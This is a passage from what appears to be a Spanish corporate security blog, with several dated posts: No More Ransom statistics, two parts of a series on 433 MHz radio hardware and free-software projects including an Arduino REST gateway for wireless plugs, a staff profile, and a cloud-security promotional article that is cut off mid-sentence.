evolucionando, volviéndose más furtiva y destructiva, y está dirigiéndose cada vez más a las empresas porque los "retornos de inversión" potenciales son mucho más altos. El ataque indiscriminado de WannaCry a mediados de mayo causó más de 300.000 víctimas comerciales en 150 países en sus primeros días, paralizando infraestructuras críticas y negocios. Algunas organizaciones todavía están luchando para recuperarse de los ataques de ExPetya del 27 de junio. El número total de usuarios que se enfrentaron a un Ransomware entre abril de 2016 y marzo de 2017 aumentó un 11,4% en comparación con los 12 meses anteriores, de 2.315.931 a 2.581.026 usuarios de todo el mundo. Las estadísticas indican que estamos en presencia de la epidemia mundial de Ransomware. El primer año de No More Ransom en números El sitio cuenta actualmente con 54 herramientas de descifrado, proporcionadas por nueve asociados, que cubren 104 tipos (familias) de Ransomware. Hasta el momento, estas herramientas han conseguido descifrar más de 28.000 dispositivos, privando a los cibercriminales de unos 8 millones de euros en rescates. El portal ha contado con más de 1,3 millones de visitantes únicos. El 14 de mayo, durante la crisis de WannaCry, 150.000 personas visitaron el sitio web. La plataforma No More Ransom ya está disponible en 26 idiomas, con las adiciones más recientes: búlgaro, chino, checo, griego, húngaro, indonesio, malayo, noruego, rumano, sueco, tamil y tailandés. Más de 100 partners: Sin fronteras entre privados, públicos o competidores No More Ransom cuenta ahora con 109 partners. Las últimas incorporaciones incluyen, desde el sector privado: Abelssoft, Ascora GmbH, Barclays, Bitsight, Universidad de Bournemouth, CERT.BE, Claranet, CERT PSE, Agencia de Seguridad Cibernética de Singapur (CSA), ESTSecurity, Fortinet, Global Forum (GFCE), InterWorks, IPA (Agencia de Promoción de la Tecnología de la Información, Japón), KISA (Korea Internet & Security Agency), Munich RE, TWCERT / CC, LLC, Universidad de Porto y vpnMentor. Se han unido también cuatro agencias policiales, provenientes de República Checa, Grecia, Hong Kong e Irán. El éxito de la iniciativa No More Ransom es un éxito compartido, que no puede lograrse solo por las agencias policiales ni por la industria privada. PopCorn Decryptor y Latch ARW RecoverPopCorn es una utilidad desarrollada desde el área de innovación de ElevenPaths para solucionar la infección producida por el ransomware PopCorn. Con esta aportación se convierte así en uno de los miembros asociados a la alianza, que desde diciembre de 2016, ha ayudado a las más de 10.000 víctimas en todo el planeta. Para más información sobre ransomware y consejos de prevención podéis acudir a ElevenPaths, www.nomoreransom.org y utilizar herramientas propias de prevención como Latch ARW.
7 de agosto de 2017
Los 433 MHz y el software libre. Parte 4
Lo que nunca se debe hacer Tras un breve vistazo se puede apreciar la gran cantidad y variedad de proyectos de Software Libre o de Código Abierto publicados bajo diferentes licencias, mediante las cuales los desarrolladores conservan sus derechos de autor, proporcionándoles una garantía legal de protección ante apropiaciones ilegitimas o que restrinjan las libertades a otros usuarios. Son innumerables los casos de éxito de software licenciado bajo GNU/GPL, como sonados los procesos en los que se detectó una violación o incumplimiento de la licencia y el fabricante se vio obligado a publicar el código fuente, retirar en producto, o dejar de distribuirlo. Apple, Microsoft, Cisco, Asus, VMware y otras muchas compañías de primer orden han tenido que ceder ante las reclamaciones y demandas de la FSF (Free Software Fundation), que según sus propias cifras, tramitan más de 50 grandes casos cada año. Por tanto, lo que nunca se debe hacer es utilizar Software Libre en un proyecto que no vaya a ser a su vez Software Libre. Y mucho menos apropiarse del código fuente y atribuirse su autoría. Desgraciadamente, también hay ejemplos de estos casos. Es precisamente lo ocurrido con el proyecto Nodo , un excelente desarrollo domótico, que implementa una interface Serial/USB vía Arduino a múltiples protocolos de radiofrecuencia en codificación ASK/OOK, tanto para emisión como para recepción. Muy versátil gracias a su particular confección mediante plugins; la ultima versión liberada v3.7 disponía de 34 plugins, y comenzaba a esbozar soporte para protocolos de radiofrecuencia a 2.4 GHz, almacenamiento en tarjetas SDcard y conectividad de red vía Ethernet. Publicado en 2013 por Paul Tonkes bajo licencia GNU GPL v3, el proyecto Nodo ha sido usurpado por un grupo que se hace llamar Stuntteam, los cuales distribuyen desde la web un software que denominan RFLink Gateway, esencialmente igual al proyecto Nodo, pero solo como un binario precompilado para Arduino Mega, infringiendo cuarta sección de la licencia GNU GPL v2 y la decimoséptima sección de la GPL v3, las cuales exigen que los programas distribuidos como binarios precompilados estén acompañados de una copia de su código fuente. RFLink debió ser más abierto en sus orígenes, ya que existen repositorios de código, tanto en SourceForge , como en GitHub, pero actualmente ambos repositorios se encuentran vacíos. Si bien es cierto que está disponible para su descarga una versión antigua (R33-2015) del código fuente desde una compartición en Google Drive, esta ya incluye un estrambótico licenciamiento, donde a pesar de reconocer la autoría de Paul Tonkes, obvian cualquier referencia al Software Libre y su licencia GNU GPL v3 original, y por el contrario, añaden indignantes clausulas totalmente contrarias al espíritu del Software Libre; citando textualmente: “No se permite descompilar, desensamblar o realizar ingeniería inversa de ninguna parte del programa precompilado”. Predicando con el ejemplo Para predicar con el ejemplo, no hay mejor forma que desarrollar un proyecto a modo de prueba de concepto (PoC), que haga uso de Software Libre, y que por tanto, deberá quedar publicado igualmente como Software Libre. La PoC propuesta será un dispositivo IoT que actúe como interface de transmisión de varios protocolos de radiofrecuencia ASK/OOK en la banda ISM de 433MHz, a una conexión de red TCP/IP, para poder utilizarse tanto localmente como desde Internet. Para simplificarla al máximo y hacerla lo más accesible posible, se ha elegido como plataforma de desarrollo un Arduino UNO R3, junto con la Shield Ethernet W5100. Ambos elementos estándar, muy económicos y fáciles de conseguir; incluso disponiendo de una caja específica para el conjunto con espacio suficiente para alojar componentes adicionales. Arduino UNO R3, Shield Ethernet W5100 y carcasa para el conjunto Como transmisor de RF 433MHz AM (ASK/OOK) es posible utilizar cualquiera de los comentados anteriormente, ya que el rendimiento en transmisión es adecuado en todos ellos. No obstante, y pese a tratarse de una prueba de concepto, se ha empleado una antena comercial estándar, junto con un transmisor Aurel/Cebek C-0507 que puede alcanzar los 400mW funcionando a 12v, aunque alimentado a 5v no supera 100mW; respetando así la regulación de la banda ISM. Su conexión es muy sencilla, ya que tan solo emplea un PIN de comunicación con Arduino, y únicamente se ha añadido un condensador para absorber posibles picos de consumo durante los instantes de transmisión. PoC interface RF 433MHz ASK/OOK a TCP/IP vía Ethernet Los protocolos a manejar serán los tres más comunes utilizados en interruptores inalámbricos tipo plug (enchufe), pero que también se encuentran en otros formatos para incorporar a la instalación eléctrica y actuar sobre cualquier elemento conectado; estos son: Flamingo 500: con codificación pseudo-rolling-code, es utilizado por los interruptores inalámbricos HomeEasy-Smartwares y sus variantes de Elro, AB440S, etc. NewKAKU: de nueva generación, tiene su origen en Klik-Aan-Klik-Uit, pero también es utilizado por Intertechno, y la gama DIO de Chacon, entre muchos otros. FHT-7901: utilizado por los veteranos interruptores inalámbricos configurables por micro switchs. De origen chino, introducidos por Kjell & Company, son comercializados bajo múltiples marcas como Bricolux, Avidsen, Impuls, etc. a precios muy económicos. Como interface al protocolo TCP/IP se ha optado por una API REST sobre un servidor Web (HTTP), la cual garantiza la interoperabilidad con cualquier sistema domótico, frontal web, o aplicación móvil, de forma extremadamente sencilla, ya que tan solo hay que realizar una petición Web (HTTP GET) para emitir un comando de radiofrecuencia codificado en el protocolo deseado. Además de las librerías estándar de Arduino, licenciadas bajo GNU LGPL, se emplearan librerías licencias con GNU GPL v3, MIT y BSD, por lo que todo el proyecto en su conjunto se publicará bajo la licencia GNU GPL v3. El código generado es valido para cualquier plataforma Arduino con arquitectura AVR: Uno, Mini, Nano, Leonardo, Mega, etc., aunque con algunos ajustes se podría adaptar a otras plataformas como Due, M0, MKR1000, ESP8266, etc. Su funcionamiento es muy sencillo; todas las tareas relacionadas con la conexión a la red están incluidas en la librería estándar de Arduino para la Shield Ethernet con el chipset de WIZnet W5100 Ethernet.h. Pese a soportar DHCP, en la PoC se utiliza direccionamiento IP estático, indicándole todos los parámetros necesarios, IP, MASK, GW, e incluso DNS, junto con la MAC Ethernet, que es obligatoria en cualquier caso. Esta librería implementa también el servidor web (HTTP) necesario para atender las peticiones web. La API REST se implementa en la librería aREST, creada por Marco Schwartz para mapear de forma sencilla las entradas y salidas de Arduino, pero en este caso no se utiliza dicha característica, y si sus facilidades para crear llamadas a funciones previamente definidas, a las que incluso les puede hacer llegar algunos parámetros de la petición HTTP GET. Se ha definido una función específica de transmisión para cada uno de los tres protocolos a manejar, los cuales están implementados en sendas librerías: FlamingoSwitch de Karl-Heinz Wind para Flamingo 500, NewRemoteSwitch para NewKAKU, y RemoteSwitch para FHT-7901, estas dos últimas desarrolladas por Randy Simons. Las llamadas a las funciones son muy parecidas, ya que los tres protocolos funcionan de forma muy similar; vía web requieren pasar los siguientes parámetros mediante la clausula params separados por el carácter punto “.” y en este orden: Comando de acción; es decir, el comando de actuación a emitir que será reconocido por el dispositivo emparejado. En Flamingo y NewKAKU puede ser “on” para encender, off para apagar y dim para indicar el valor de un rango definido en dispositivos regulables (dimmers) que permiten regular la intensidad de una luz, por ejemplo, y no solo apagarla o encenderla. FHT solo soporta “on” y “off”. Identificador de controlador; es decir, el identificador de un mando original. En Flamingo y NewKAKU es numérico, y en FHT se define según la posición de los cinco micro switch del mando. Si no se dispone de un mando original, o no podemos leer su identificador, podemos elegir cualquiera al azar y emparejar los dispositivos con él. Identificador de dispositivo; es decir, el identificador del botón de un mando original emparejado con un dispositivo. En Flamingo y NewKAKU podemos elegir cualquiera al azar, ya que los dispositivos tienen la capacidad de reconocer el identificador al emparejarse. Por el contrario, en FHT debe corresponderse con la letra seleccionada en el micro switch del dispositivo. Adicionalmente a los elementos propios para el funcionamiento de la PoC, tan solo se ha añadido un watchdog timer como medida de protección ante un hipotético bloqueo del sistema (tras semanas de pruebas y uso intensivo no se ha dado el caso), y la impresión de mensajes de depuración por la salida Serie/USB de Arduino, tal y como se muestra a continuación: Estos mensajes de depuración incluyen un identificador numérico negativo cuando se produce una condición de error, cuyo significado variará según sea el caso, por lo que hay que recurrir a los comentarios del código fuente para interpretarlo. Dada la implementación de la API REST en la librería “aREST.h”, esta devolverá siempre un código de estado HTTP 200 OK, junto con una respuesta en formato JSON, ante cualquier petición web (HTTP GET) que se realice. El array JSON de respuesta deberá contener siempre el elemento return_value con valor cero “0” en caso de ejecución satisfactoria, o el valor negativo correspondiente al código de error producido en su defecto. La ausencia el elemento return_value puede considerarse también una condición de error, ya que indica que no se ha ejecutado ninguna de las tres funciones definidas para la transmisión de comandos de RF. A continuación se muestran los tres tipos de respuestas JSON citados: Todo el código fuente de la PoC está publicado bajo licencia GNU GPL v3 en el siguiente repositorio de GitHub: https://github.com/latchdevel/RF433-IPGW Se incluyen las partes utilizadas de todas las librerías necesarias, por lo que basta con clonar o descargarse el repositorio, y compilar el Sketch desde el IDE de Arduino, para comenzar a utilizarlo de forma tan sencilla como se muestra a continuación: Este es el aspecto final del dispositivo IoT creado para la PoC propuesta: Conclusiones La gran mayoría de los sistemas IoT y Domóticos que hacen uso de la banda ISM de 433MHz en AM, lo hacen, por norma general, en ausencia de medidas de seguridad. No ofreciendo ninguna garantía de privacidad, autenticidad, o integridad; siendo posible interceptar y suplantar prácticamente cualquier comunicación. No es necesario disponer de un costoso hardware específico; con tan solo unos económicos módulos genéricos y un Arduino o Raspberry PI, es suficiente para comenzar a experimentar en la banda. Hay disponible una ingente cantidad de software que permite capturar las señales de radiofrecuencia, analizar los protocolos de comunicación, construir nuevos mensajes y emitirlos sin mayor dificultad. Queda demostrado que la seguridad por oscuridad que persiguen algunos fabricantes no constituye una buena practica, siendo sobrepasada por la altruista práctica de compartir descubrimientos y código que realiza una amplia comunidad de desarrolladores. Más información: Los 433 MHz y el software libre. Parte 1. Los 433 MHz y el software libre. Parte 2. Los 433 MHz y el software libre. Parte 3. Jorge Rivera CSA Global de ElevenPaths jorge.rivera@11paths.com
4 de agosto de 2017
Los 433 MHz y el Software Libre. Parte 3
Antes de adentrarse en los proyectos de software, es conveniente considerar el hardware que será necesario, mínimo en muchos casos, pero imprescindible. Hardware RF 433Mhz AM (ASK/OOK) Receptor SDR-RTL. Aunque no es propiamente dicho un hardware específico para trabajar en la banda ISM de 433 MHz, su extrema versatilidad hace que sea posible de forma muy sencilla. Puede utilizarse cualquier receptor USB de TDT que cuente con un chipset compatible, existiendo controladores y software para sistemas Windows, Mac OS X, BSD, Linux (Raspberry incluido), e incluso para Android. Receptor-Trasmisor por tarjeta de sonido. Es la opción más económica, ya que tan solo es necesario el receptor y/o el transmisor, conectándolos directamente a la tarjeta de sonido de cualquier equipo, aunque se recomienda una tarjeta de sonido externa por USB. Puede utilizarse tanto en Windows y Mac OS X, como en Linux (Raspberry incluido). Receptor-Trasmisor por GPIO en Raspberry PI. Es extensible a cualquier plataforma Linux que pueda manejar, al menos, una línea de entrada/salida digital (GPIO), como podría ser un router con OpenWRT o similar. Receptor-Trasmisor en Arduino. Esta es la opción preferida por la comunidad de makers que montan sus proyectos para funcionar de forma autónoma sin la necesidad de un PC, o bien como interface a través del puerto USB. Puede utilizarse en cualquiera de las múltiples plataformas compatibles con Arduino, como los ESP8266 con Wifi, los potentes Teensy, o los mínimos Trinket. Antenas Es habitual que los módulos de bajo coste se presenten sin antena. Esta configuración es funcional, pero el rango de alcance es de apenas unos metros, por lo que solo se puede utilizar para realizar pruebas dentro del entorno cercano. Si necesitamos un alcance mayor, tanto para el emisor como para el receptor, se hace imprescindible incorporar una antena sintonizada lo más aproximadamente posible a la frecuencia central de la banda de trabajo, en este caso, 433.92 MHz. Las características de la antena influyen notablemente en la calidad de la emisión y recepción, por lo que es un elemento crucial cuando se requieren unas mínimas prestaciones . No obstante, el diseño de la antena puede ser realmente simple. Los tipos más usuales son en espiral, en bucle, o en hilo; todos ellos de fácil calculo e implementación, gracias a la abundante documentación y programas de ayuda disponibles en internet. La antena más sencilla posible es tan solo un hilo (whip, látigo en inglés), de un cuarto de la longitud de onda, poco más de 17 centímetros, con la que se obtienen resultados satisfactorios. También son de uso habitual las antenas en espiral por su reducido tamaño, así como sus diferentes combinaciones con otros elementos. Proyectos de Software Libre El “ Software Libre” (Free Software), y el software de “ Código Abierto” (Open Source), no son lo mismo aunque suelen utilizarse ambos términos indistintamente; y por supuesto, ninguno de los dos tiene relación alguna con el concepto de “gratuito” al que muchas veces se simplifican. Estas dos iniciativas son promovidas por organizaciones diferentes, por un lado la FSF, Fundación para el Software Libre, liderada por Richard Stallman, elabora, mantiene y defiende la Licencia Pública General GNU ( GNU/GPL) desde 1989. Sus diferentes versiones y variantes se fundamentan en cuatro libertades esenciales: La libertad para usar el software como se desee, con cualquier propósito (libertad 0). La libertad para estudiar su funcionamiento y adaptarlo a otras necesidades (libertad 1). La libertad para redistribuir copias a otros usuarios (libertad 2). La libertad para modificar el software y distribuir copias de las modificaciones (libertad 3). El acceso al código fuente es una condición necesaria para satisfacer las libertades primera y tercera, implicando que cualquier software derivado que utilice Software Libre, debe ser a su vez Software Libre, y por lo tanto respetar sus libertadas, quedando obligando a la publicación del código fuente, tanto de las modificaciones del Software Libre utilizado, si las hubiera, como del resto del software en su conjunto. Por otro lado está la OSI, Iniciativa para el Código Abierto, creada casi 10 años más tarde por Bruce Perens y Eric S. Raymond, con el objetivo de acentuar los beneficios prácticos del acceso al código fuente, frente a los aspectos éticos o de libertad de índole filosófico que son tan relevantes en el Software Libre. La FSF y la OSI se reconocen mutuamente como aliadas, ya que persiguen objetivos similares, aunque no coincidan demasiado en sus principios básicos. Articulan diferentes “ licencias” como instrumentos jurídicos para definir y salvaguardar los términos en los que un software es publicado. Se calcula que más del 60% de todo el software de dominio público se licencia bajo alguna de las versiones de Software Libre GNU/GPL, mientras que el resto queda muy repartido entre diferentes variantes y otras licencias Open Source más permisivas como BSD, Apache, X11, MIT, o Mozilla. La diferencia más significativa entre las licencias de Software Libre y las licencias Open Source, es que estas últimas no obligan a redistribuir el código fuente del software que las utiliza. Receptor SDR-RTL Es posible utilizar cualquier receptor de tipo SDR que tenga capacidad para sintonizar la banda de 433 MHz para poder comenzar a experimentar utilizando herramientas de Software Libre muy maduras como GNU Radio, o las recogidas bajo osmocom.org, de la cual forman parte los trabajos para manejar los dispositivos USB receptores de TDT con chipset Realtek, SDR-RTL (enlace a github aquí) muy accesibles por su bajo coste. En la wiki de osmocom se enlazan más de 30 proyectos de Software Libre relacionados, destacando especialmente el proyecto RTL_433 (enlace a github aquí), específicamente diseñado para desentrañar las comunicaciones AM (ASK/OOK) en de la banda ISM de 433 MHz. Gracias a las numerosas contribuciones que realizan los investigadores al proyecto, dispone de capacidad para interpretar casi 80 protocolos de comunicación diferentes, lo que lo convierte en una herramienta extremadamente útil a la hora de analizar cualquier actividad en dicha banda. Ejemplo de captura con RTL_433 Transmisor-Receptor por tarjeta de sonido La conexión de módulos de emisión y/o recepción de radiofrecuencia ASK/OOK a la salida y/o entrada de audio de un equipo, transforma los impulsos de AM en señales manejables como si de audio se tratara, por lo que se puede emplear cualquier software existente para este ámbito; como Audacity por ejemplo, tanto para recibir como para emitir en la frecuencia de 433 MHz. Como proyecto específico, es meritorio el trabajo de Danny Havenith, CHEAPL (enlace github aquí), ya que su simplicidad, solo soporta el protocolo X10, hace que sea tremendamente didáctico. Digna de mención es también la labor del proyecto OpenHomeNet, los cuales han publicado un analizador de protocolos escrito en Java (enlace a github aquí) que soporta 12 de los protocolos más extendidos. Analizador de protocolos del proyecto OpenHomeNet Transmisor-Receptor por GP10 Cuando la conexión de los módulos de emisión y recepción AM (ASK/OOK) se realiza directamente a los terminales GPIO que exponen algunas plataformas como Raspberry PI o Beaglebone, las posibilidades de integración se incrementan notablemente, ya que es posible manejar las señales ASK/OOK como si de señales digitales binarias se tratara. Destacan los proyectos de Jean-Christophe Rona (enlace a github aquí), abarcando desde una interface de recepción y emisión que soporta los 8 protocolos más habituales de interruptores domésticos, hasta una GUI Web para la interface, pasando por un módulo de Kernel Linux para su integración en routers con OpenWRT, de forma similar o otro proyecto parecido donde se ejecuta en espacio de usuario (enlace a github aquí). Router OpenWRT con transmisor RF 433Mhz AM (ASK/OOK) por GPIO y GUI Web de control En lenguaje Python, con entorno web, integrando con base de datos SQL y soportando el protocolo Nexa, encontramos el proyecto Cr-Smart-Home (enlace a github aquí); un buen ejemplo de las posibilidades que ofrece la combinación de diferentes componentes software. Con un alcance mucho más amplio, ya que comprende un sistema domótico completo, destaca “ pilight”, un magnifico proyecto excelentemente documentado, en el que han diseñado un robusta interface con los módulos de radiofrecuencia conectados vía GPIO mediante wrappers TCP/IP, e incluso han desarrollado un pre-filtro digital externo para mejorar las capacidades de recepción. Soportan decenas de protocolos tanto en emisión como en recepción, pudiéndose instalar y utilizar cada módulo de forma independiente (enlace a github aquí). Menú de instalación de “pilight” Transmisor-Receptor con Arduino Arduino es sin duda la plataforma con mayor cantidad de proyectos de Software Libre y Código Abierto relacionados con los módulos de radiofrecuencia AM (ASK/OOK), debido a la facilidad con la que pueden manejarse, tanto en recepción como en emisión. El proyecto emblema es RC-Switch (enlace a github aquí), tremendamente didáctico, soporta varios protocolos fácilmente ajustables, incluyendo un sketch de recepción a modo de scanner o sniffer, como el de RCControl, muy útil en tareas de investigación y depuración. Ha sido portado a otras plataformas como Raspberry PI, en diferentes implementaciones. Aunque el entorno de programación de Arduino soporta ya plataformas muy potentes, tradicionalmente sus desarrollos han estado marcados por la escasez de recursos del hardware, por lo que es difícil encontrar un gran proyecto que soporte múltiples protocolos, en favor de múltiples proyectos que soportan un número reducido de protocolos; como por ejemplo: RemoteSwitch, NewRemoteSwitch, NexaCtrl, Oregon, InterTechno o FlamingoSwitch, combinándose estas implementaciones en otros proyectos que agrupan varias librerías como HRCSwitch y RFToy, o incluso en proyectos de traducción entre protocolos diferentes. También son muy frecuentes las implementaciones de interconexión inalámbrica entre Arduinos, Raspberrys, o combinaciones de ambos, utilizando módulos de radiofrecuencia ASK/OOK, junto con estos protocolos, VirtualWire, o incluso directamente a través de la UART serie a baja velocidad, unos 2400 bps, como a continuación podemos observar en una simulación con Proteus. Emulación de Arduino y módulos de RF 433MHz Más información: Los 433 MHz y el software libre. Parte 1. Los 433 MHz y el software libre. Parte 2. Los 433 MHz y el software libre. Parte 4. Jorge Rivera CSA Global de ElevenPaths jorge.rivera@11paths.com
28 de julio de 2017
Yaiza Rubio, la primera mujer hacker de España en participar en DefCON & BlackHat
Esta entrada tiene como protagonista a una de nuestras hackers favoritas Yaiza Rubio, del equipo de analistas de inteligencia de ElevenPaths. Licenciada en Ciencias de la Información y con tres masters (Análisis de Inteligencia, Logística y Economía de la Defensa, y Derecho Tecnológico y de las TIC), se ha convertido en una #mujerhacker referente en el mundo de la ciberseguridad. Comenzó a adentrarse en este sector junto a su compañero Félix Brezo, también analista de inteligencia de ElevenPaths, que conoció en el Máster de Análisis de Inteligencia. Ella trabajaba en ISDEFE, en la unidad de desarrollo de negocio de la industria española de defensa y seguridad, Félix en el laboratorio de seguridad de la Universidad de Deusto. De ahí llegaron a trabajar en el montaje de lo que actualmente es el servicio de CyberThreats de ElevenPaths. Después de esta aventura ahora se adentran en otra juntos, participando en las dos conferencias más importantes de ciberseguridad. Yaiza es la primera mujer hacker de España que va a participar en las dos conferencias más importantes de ciberseguridad: DefCON & BlackHat en Las Vegas. Desde el pasado sábado 22 de julio y hasta el día 27, nuestros analistas de inteligencia presentarán en la BlackHat OSRFramework, un conjunto de herramientas de software libre con el que llevan trabajando cuatro años dando soporte a los procedimientos de investigación sobre la huella digital de ciberidentidades con presencia en la red, permitiendo identificar al responsable de cualquier actividad delictiva, desde acosadores hasta terroristas. Por otro lado, en la DefCON participarán a través de una intervención sobre ingeniería social, mostrando cuál es el proceso de preparación ante un ataque phishing, apoyándose en tecnologías como Tor (un software que permite acceder a la deep web). Chema Alonso, Chairman de ElevenPaths, publicó en su blog una entrevista que realizó a la hacker en la que reconocía el orgullo que supone contar con ella como parte del equipo de ElevenPaths. Durante la entrevista, Chema se interesó por saber sus motivaciones sobre la intervención en la DefCON & BlackHat a lo que respondió que a pesar de que le asuste su primera experiencia, prefiere enfrentarse a ello antes que dejarlo de lado. Mujeres hacker Yaiza se ha convertido en un referente para las futuras generaciones que aspiran a convertir la tecnología como su forma de vida. En el vídeo donde presentamos a nuestras #mujereshacker Yaiza motiva a todas las mujeres a seguir su camino en el mundo de la tecnología y la seguridad, ya que considera que siempre hay que dar oportunidad a aprender. Enhorabuena hacker, para ElevenPaths es un orgullo contar contigo en nuestro equipo. Let´s hack! Síguenos y entérate de todo en nuestras redes sociales: Twitter, Facebook y LinkedIn
26 de julio de 2017
Entorno nube seguro con un Telco Cloud Provider
En la actualidad, nadie puede negar los importantes beneficios de la computación en la nube, tanto en su modalidad de infraestructura como servicio (IaaS) como en software como servicio (SaaS). La computación en la nube implica ahorro de costes, flexibilidad a la hora de satisfacer las necesidades de las organizaciones e innovación. En suma, es un factor fundamental en la transformación digital corporativa. Sin embargo, los entornos en la nube conllevan un cierto nivel de complejidad a la hora de gestionar la seguridad TI, debido a que las organizaciones delegan en terceros la responsabilidad del almacenamiento y control de datos sensibles. A lo largo de este artículo, se identificará los retos de la seguridad en la nube y en consecuencia se propondrá un modelo de seguridad, de acuerdo a la perspectiva de un Telco Cloud Provider, para facilitar y asegurar el viaje hacia el entorno en la nube. Los profesionales de TI y de seguridad son plenamente conscientes de los riesgos para la seguridad de la información y de cómo estos afectan a los entornos en la nube. Sin embargo el continuo bombardeo de noticias sobre ciberataques, a parte de fomentar la concienciación de seguridad en el público en general –lo que es claramente necesario-, está contribuyendo a difundir una serie de ideas equivocadas sobre el nivel de seguridad de estos entornos. ¿Qué crees que es más conveniente?, ¿guardar el dinero en el colchón o en un banco? Con el dinero en el colchón, este estará siempre disponible (simplicidad) y puede ser menos probable que seas seleccionado por los delincuentes como objetivo, pero si por alguna razón alguien asalta tu casa, sin duda necesitaras el mejor sistema de protección para impedirlo o detectarlo. Debemos preguntarnos entonces si somos capaces de implementar medidas de seguridad similares a las de un banco. En el informe de Visión en Nube 2016 de IDC, se constató que las preocupaciones de seguridad siguen siendo el inhibidor clave para continuar con el despliegue de entornos en la nube. ¿Esta impresión está fundamentada en circunstancias reales? Creemos que no. La mayoría de los ataques cibernéticos no están relacionados con la propia infraestructura de la nube ni tampoco pueden atribuirse al proveedor de estos servicios. Por su parte, Gartner sustenta esta presunción en un reciente análisis el cual presume que, hasta 2020, el 95 por ciento de los fallos de seguridad en la nube serán responsabilidad del cliente. Aunque el riesgo de seguridad es similar para un entorno de nube o en local, es necesario ser conscientes de que existen tres inconvenientes que deben ser atajados: la complejidad, comunicaciones vulnerables y el aumento en la exposición de los activos. Complejidad de un entorno sin fronteras El perímetro de las organizaciones actuales ha sido demolido por tecnologías como la movilidad, las redes definidas por software (SDN) y los servicios en la nube, así como por requisitos operativos como son la necesidad de segurizar el proceso de producción o la cadenas de suministro. Gartner vaticina que para el año 2018, el 25% del tráfico de datos corporativos fluirá directamente de los dispositivos móviles a la nube, evitando controles de seguridad empresariales tradicionales. Esto es un quebradero de cabeza para los departamentos de TI, quienes han de ocuparse de docenas de servicios de terceros alojados en diferentes nubes, proveedores de aplicaciones SaaS y servicios en la nube no autorizados tanto desde el interior del perímetro, como desde el exterior, lo que parece prácticamente imposible de manejar. Por esta razón, las organizaciones demandan a los proveedores de servicios en la nube la implementación de controles de seguridad adecuados, por lo menos equivalentes a los que se podría implantar en un centro de datos local, y además establecer mecanismos de control y notificación flexibles y efectivos. Calidad de Servicio en Comunicaciones Aunque las organizaciones puedan acceder a sus Virtual Private Clouds (VPC) a través de Internet, esta opción presenta inconvenientes diversos y costosos, como problemas de seguridad de las comunicaciones, latencia, demoras, pérdida de datos y jitter, entre otros. Esto, pone en riesgo la calidad de servicio (QoS) esperada de una red de datos en un entorno profesional cuando se trata de acceder a aplicaciones corporativas. Exposición de aplicaciones En el momento de abandonar el perímetro corporativo y hacer uso de SaaS o aplicaciones de cliente en IaaS, se presenta una mayor exposición y por tanto una mayor facilidad para explotar las vulnerabilidades. Este riesgo es una consecuencia indirecta de la migración de las aplicaciones corporativas a la nube. No es intrínseco a la propia nube, sino que reside en las vulnerabilidades no solucionadas en estas aplicaciones que por haber estado en un entorno más o menos cerrado han pasado desapercibidas. Puesto que las organizaciones han asumido que vivir en un agujero en el suelo ya no es una opción, entonces es necesario implementar una serie de buenas prácticas, tales como monitoreo de seguridad, evaluación de vulnerabilidades o gestión de identidad y acceso. Seguridad de la nube Los proveedores de servicios en la nube ponen el foco en asegurar la infraestructura, implementando mecanismos similares a los que usualmente se utilizan en los centros de datos, convirtiendo en transparentes estas medidas para los clientes. Estas medidas incluyen: Resiliencia de la información: el proveedor de servicios de nube debe tener almacenamiento distribuido en varias regiones para garantizar la disponibilidad global. Como parte de su oferta global de servicios en la nube, Telefónica ofrece nodos en diferentes países para resolver problemas regulatorios locales, sin socavar una perspectiva unificada y global que pueda ser requerida por clientes multinacionales o que necesiten portabilidad de información entre regiones. Segmentación: en un entorno compartido, debe garantizarse el aislamiento total entre los usuarios y que el uso (o abuso) de uno de ellos no afecta el rendimiento del resto. Certificaciones: las certificaciones de terceros brindan garantías sobre la implementación y operación de las medidas de seguridad. Organizaciones como Cloud Security Alliance (CSA) otorgan certificaciones como CSA Star, basadas en el grupo de estándares ISO 27001 y adaptadas específicamente para servicios en la nube. Seguridad hacia la nube La mejor opción para abordar el problema de comunicación entre la red privada y la VPC es permitir la extensión de redes privadas virtuales (VPN) sobre tecnología IP / MPLS y con cobertura global. De esta manera, todos los recursos corporativos, instancias, bases de datos o puntos finales, independientemente de dónde se encuentren, son visibles en la misma LAN. Este modelo permite incluir fácilmente una capa de seguridad adicional mediante firewalls de próxima generación desplegados en la misma red de acceso para filtrar y bloquear cualquier malware y tráfico no deseado, lo que se conoce como servicios de Redes Limpias. Por último, las organizaciones pueden delegar el despliegue de la defensa perimetral en el proveedor de acceso a Internet, obteniendo una arquitectura de fácil escalabilidad, una mayor resiliencia y una reducción de costos (moviendo CAPEX a OPEX), y si el provedor de acceso a internet también puede proporcionar el entorno en la nube las sinergias serán significativas, a la vez que se garantiza una seguridad extremo a extremo. Sumado a lo anterior, una propuesta integrada de servicios de nube y telecomunicaciones permite contratar servicios diferenciales de primera clase como AntiDDoS (Global Shield) que detiene los ataques desde la red, incluso antes de que afecten al centro de datos. Seguridad en la nube Visibilidad y control: también es necesario resaltar la importancia de contar con herramientas que permitan una visibilidad del estado general de seguridad, así como herramientas de monitorización, detección y respuesta. Una plataforma de análisis de vulnerabilidades como es Vamps puede integrarse en los procesos de prueba y contribuir a un proceso de desarrollo más seguro Integración con plataformas de seguridad gestionadas: uno de los factores diferenciales de un proveedor de servicios en la nube es poder ofrecer una perfecta integración con servicios de Seguridad Gestionada (MSS/Managed Security Service). Si el mismo proveedor puede ofrecer ambos, la complejidad, el principal quebradero de cabeza de la seguridad gestionada, se reduce de manera significativa. Gestión del riesgo y el cumplimiento normativo: es necesario contar con herramientas específicas para la gestión de riesgos y el cumplimiento normativo que se adapten a los servicios en la nube. Telefónica dispone en su cartera una solución específica, Sandas GRC, que interacciona con los recursos corporativos desplegados en la nube de Telefónica. Gestión de Identidad y procesos de Autenticación: la plataforma de servicios en la nube debe ofrecer la capacidad de una gestión integral y genérica de la identidad, que se interrelacione con la del resto de servicios utilizados por la organización, como por ejemplo los de comunicaciones o aplicaciones. Para ello, Telefónica ofrece servicios tan conocidos como Latch y Mobile Connect en su oferta de servicios en la nube. La solución de un Telco Cloud Provider Como vemos, si se opta por un Telco Cloud Provider, las organizaciones pueden disponer de una oferta de productos integrados –alojamiento, comunicaciones, servicios especializados de seguridad, operación y soporte–, los cuales, al haber sido diseñados de manera holística, conllevan un dimensionamiento adecuado a las necesidades de seguridad, simplicidad a la hora de operar el sistema, garantía de calidad de servicio (QoS) en las comunicaciones y un ahorro de costes al contratarlo conjuntamente. En resumen, Telefónica, gracias a su capacidad de proveedor integral, es capaz de ofrecer una solución única de seguridad en la nube en la que se combinan los 